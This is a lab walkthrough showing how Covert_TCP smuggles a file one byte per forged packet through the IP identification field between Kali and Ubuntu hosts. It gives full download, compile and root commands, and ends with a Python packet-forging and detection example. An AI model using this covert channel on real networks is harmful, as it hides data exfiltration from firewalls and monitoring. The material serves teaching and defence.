Covert_TCP manipulates fields of the TCP/IP headers of forged packets to transfer a file one byte per packet to a destination host.
Networks enforce access control rules (firewalls, IDS/IPS, web proxies) to permit or deny traffic. Tunneling wraps traffic that would be blocked inside traffic that is allowed, and a covert channel goes one step further by hiding data in protocol header fields that are unused, sender-chosen, or rarely inspected. TCP and IP have several such fields (for example the IP identification field and the TCP initial sequence number), and data written into them can cross a firewall that only inspects addresses, ports, flags and payload.
Covert_TCP
Covert_TCP manipulates the TCP/IP headers of the packets it forges to send a file one byte at a time from one host to another. The same binary acts as the client (sender) or, with -server, as the receiver. By default it carries each byte in the IP identification field; it can also use the TCP initial sequence number or, via a bounce host, the TCP acknowledgement number. Because it crafts raw packets, it has to run as root on both ends. The packets carry no payload, so a firewall or sniffer that only looks at the data portion sees legitimate-looking, empty TCP packets with nothing to analyze.
On Kali Linux, launch a new Terminal window.
Create a folder named send on your Desktop, and navigate into it:
cd Desktop
mkdir send
cd send
Create a text file called message.txt inside send folder containing the string: Secret Message!
echo "Secret Message!" > message.txt
Download the covert_tcp.c file into the send folder:
wget https://raw.githubusercontent.com/cudeso/security-tools/master/networktools/covert/covert_tcp.c
Compile covert_tcp.c:
cc -o covert_tcp covert_tcp.c
Go to your Ubuntu machine and open a new Terminal window.
Switch to super-user access:
sudo su
Start tcpdump as shown below:
tcpdump -nvvX port 8888 -i lo
Leave the tcpdump listener running and open another Terminal window or tab.
Go to Desktop, create a folder named receive and navigate into it:
cd Desktop
mkdir receive
cd receive
Download the covert_tcp.c file into the receive folder:
wget https://raw.githubusercontent.com/cudeso/security-tools/master/networktools/covert/covert_tcp.c
Compile covert_tcp.c:
cc -o covert_tcp covert_tcp.c
Note: if you get an error that the cc command is not found, install the compiler:
sudo apt install gcc
Still as root, start covert_tcp in server mode; it writes the characters it receives to receive.txt. Note that the port numbers are mirrored between this command and the client command run later on Kali:
./covert_tcp -dest 10.0.2.46 -source 10.0.2.42 -source_port 9999 -dest_port 8888 -server -file /home/s4msepi0l/Desktop/receive/receive.txt
Go back to Kali and launch Wireshark.
Start capturing by double-clicking your primary network interface.
Then, in the Kali terminal (as root, inside the send folder), run the client. The source and destination ports are the reverse of those given to the server:
./covert_tcp -dest 10.0.2.46 -source 10.0.2.42 -source_port 8888 -dest_port 9999 -file /root/Desktop/send/message.txt
On your Ubuntu machine, stop tcpdump by pressing Ctrl+C.
tcpdump reports that no packets were captured. Be careful about what this does and does not show: the capture was bound to the loopback interface (-i lo), which never carries traffic between Kali and Ubuntu, so it would have been empty for an ordinary connection too. A capture on the interface that holds 10.0.2.46 would show the forged packets, exactly as the Wireshark capture on Kali does. What the tool hides is the data, which never appears as payload, not the packets themselves.
Navigate to ~/Desktop/receive/ and open receive.txt. You will see the full message saved in the file as shown below:
Switch back to the Kali and Stop the packet capturing on the Wireshark by clicking on the top-left red switch.
Click on the "Apply a display filter" field and type tcp to view only the TCP packets as shown below:
If you examine the communication between Kali and Ubuntu (10.0.2.42 and 10.0.2.46) you will find one packet per character of the message, each with an empty TCP payload, as shown on the next screenshots:
Covert_tcp does not replace the TCP header; it forges a normal-looking TCP packet for each character and stores that character's byte value in a header field (the IP identification field by default). Expand the Internet Protocol section of each packet in Wireshark and look at the Identification field: the message is carried there, one character per packet, without ever appearing as data.
Packet 1, string: S
Packet 2, string: e
Packet 3, string: c
Packet 4, string: r
(…) And so on until the entire message was completed.
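To make the mechanism concrete, here is an added Python example (not covert_tcp's own code) that forges covert_tcp-style packets in memory, decodes them the way the -server side does, and applies a detection heuristic a defender could run over a capture. Assumptions: each byte goes into the low-order byte of the IPv4 Identification field of a payload-less SYN (the real tool's exact byte placement may differ), the TCP checksum is left zero because nothing is transmitted, and the addresses and ports are the lab's (10.0.2.42:8888 to 10.0.2.46:9999). Function names are my own.

```python
import struct

# Constructed sample parameters taken from the lab above (assumption: the
# encoding below mirrors covert_tcp's default IP ID mode closely enough to
# illustrate it; it is not the tool's source).
SRC = "10.0.2.42"
DST = "10.0.2.46"
SRC_PORT = 8888
DST_PORT = 9999
TCP_SYN = 0x02


def _ip_to_bytes(addr):
    return bytes(int(o) for o in addr.split("."))


def _checksum(data):
    """One's-complement checksum as used by the IPv4 header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_covert_packet(ip_id, src=SRC, dst=DST, sport=SRC_PORT, dport=DST_PORT):
    """Forge an IPv4+TCP SYN with no payload; the secret byte travels in ip_id."""
    total_len = 20 + 20                      # IP header + TCP header, zero payload
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, ip_id, 0,
                         64, 6, 0, _ip_to_bytes(src), _ip_to_bytes(dst))
    ip_hdr = ip_hdr[:10] + struct.pack("!H", _checksum(ip_hdr)) + ip_hdr[12:]
    # seq/ack arbitrary, data offset 5 (20 bytes), SYN flag, window 512,
    # TCP checksum left 0 because this packet is never put on the wire.
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, TCP_SYN, 512, 0, 0)
    return ip_hdr + tcp_hdr


def send_message(msg):
    """Client side: one packet per byte of the message."""
    return [build_covert_packet(b) for b in msg.encode()]


def parse_packet(pkt):
    """Return (src, dst, ip_id, sport, dport, tcp_flags, payload_len) from raw bytes."""
    ver_ihl, _, total_len, ip_id, _, _, _, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    sport, dport, _, _, off_res, flags = struct.unpack("!HHIIBB", pkt[ihl:ihl + 14])
    doff = (off_res >> 4) * 4
    payload_len = total_len - ihl - doff
    return (".".join(map(str, src)), ".".join(map(str, dst)),
            ip_id, sport, dport, flags, payload_len)


def receive_message(packets, src=SRC, sport=SRC_PORT, dport=DST_PORT):
    """Server side: accept only packets from the expected sender/ports (as the
    -server options do) and reassemble the low byte of each IP ID."""
    out = bytearray()
    for pkt in packets:
        s, _, ip_id, sp, dp, _, _ = parse_packet(pkt)
        if s == src and sp == sport and dp == dport:
            out.append(ip_id & 0xFF)
    return out.decode(errors="replace")


def looks_like_ipid_channel(packets, min_packets=8):
    """Detection heuristic: a flow made only of payload-less SYNs whose 16-bit
    IP IDs all fit in one byte and are mostly printable ASCII. Normal stacks use
    random or incrementing IDs and real connections carry data after the handshake."""
    by_flow = {}
    for pkt in packets:
        s, d, ip_id, _, _, flags, plen = parse_packet(pkt)
        by_flow.setdefault((s, d), []).append((ip_id, flags, plen))
    suspicious = []
    for flow, recs in by_flow.items():
        if len(recs) < min_packets:
            continue
        syn_empty = sum(1 for ip_id, f, p in recs if f & TCP_SYN and p == 0)
        printable = sum(1 for ip_id, f, p in recs if ip_id < 256 and 0x20 <= ip_id < 0x7F)
        if syn_empty == len(recs) and printable / len(recs) > 0.9:
            suspicious.append(flow)
    return suspicious


if __name__ == "__main__":
    pkts = send_message("Secret Message!")
    print("decoded:", receive_message(pkts))
    print("suspicious flows:", looks_like_ipid_channel(pkts))
```

The detector keys on the two things this channel cannot hide: a run of payload-less SYNs from one source, and IP identification values that are suspiciously small and ASCII-shaped. Either alone is noisy (SYN scans, old stacks with small IDs); together they are a strong signal, and the same logic can be run over a real pcap once the raw frames are stripped of their Ethernet header.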